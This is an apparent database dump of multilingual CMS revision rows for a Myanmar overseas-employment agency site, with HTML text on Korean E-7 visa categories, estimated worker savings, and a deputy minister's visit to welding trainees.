('activities', 0, 7, 154, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 154, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 154, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 216, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 216, 'ja', 0, '<p>E-7ビザは外国人に対する特定能力を持つ方のための特別なビザであり、以下のカテゴリーに分けられています：</p><p>E-7-1ビザ（専門家）：特定の分野の管理職や専門家に対して与えられるビザです。</p><p>E-7-2ビザ（準専門職）：オフィスの仕事やサービス業に従事する方に対するビザです。</p><p>E-7-3ビザ（技術者）：技術分野で働く方に対するビザです。</p><p>E-7-4ビザ（経験豊富な技術者）：経験豊富な技術者向けのビザで、通常、5年以上の経験を持つ労働者はE-9から移行します。</p>', '', 'full_html'),
('activities', 0, 7, 216, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 288, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ja', 0, '<p>E-7ビザは外国人に対する特定能力を持つ方のための特別なビザであり、以下のカテゴリーに分けられています：</p><p>E-7-1ビザ（専門家）：特定の分野の管理職や専門家に対して与えられるビザです。</p><p>E-7-2ビザ（準専門職）：オフィスの仕事やサービス業に従事する方に対するビザです。</p><p>E-7-3ビザ（技術者）：技術分野で働く方に対するビザです。</p><p>E-7-4ビザ（経験豊富な技術者）：経験豊富な技術者向けのビザで、通常、5年以上の経験を持つ労働者はE-9から移行します。</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 8, 13, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 23, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 110, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 110, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 111, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 111, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 111, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 112, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 112, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 112, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။ tt</p>', '', 'full_html'),
('activities', 0, 8, 113, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 113, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 113, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 114, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 114, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 114, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 152, 'en', 0, '<p>&nbsp;Overtime 3 hours a day and (22) days off, After deducting money to be earned and other living and dining expenses, health insurance and income tax expenses, there may be more than 50,000,000 MMK left.</p>', '', 'full_html'),
('activities', 0, 8, 152, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 152, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 215, 'en', 0, '<p>&nbsp;Overtime 3 hours a day and (22) days off, After deducting money to be earned and other living and dining expenses, health insurance and income tax expenses, there may be more than 50,000,000 MMK left.</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ja', 0, '<p>&nbsp;1日3時間の残業と（22日）の休暇があり、収入から差し引かれるべき金額や生活費、食費、健康保険、所得税などの経費を差し引いた後、50,000,000 MMK以上が残る可能性があります。</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 9, 14, 'en', 0, '<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</div></div>', '', 'full_html'),
('activities', 0, 9, 15, 'en', 0, '<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</div></div>', '', 'full_html'),
('activities', 0, 9, 34, 'en', 0, '<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</div></div>', '', 'full_html'),
('activities', 0, 9, 44, 'en', 0, '<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:&quot;Segoe UI Historic&quot;, &quot;Segoe UI&quot;, Helvetica, Arial, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;text-align:start;\" dir=\"auto\">ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</div></div>', '', 'full_html'),
('activities', 0, 17, 57, 'en', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\"><img data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 58, 'en', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 119, 'en', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 119, 'ja', 0, '<p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-7ee350e41c45178cb432aa5aa52d795c6adfd221ac96379afed3a03499e3a747_14d6ecd2402a0859_1.jpg\" data-entity-uuid=\"25d38117-d3f0-43a9-ae8b-a08395215cc6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-0a-895c86199c395f997e8ce2bd0b59d65d635c7469c59dd1557e275b65ac1f5e87_66b981cd20d14fd9.jpg\" data-entity-uuid=\"35f27450-28eb-4880-b91a-6b4d346b559c\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
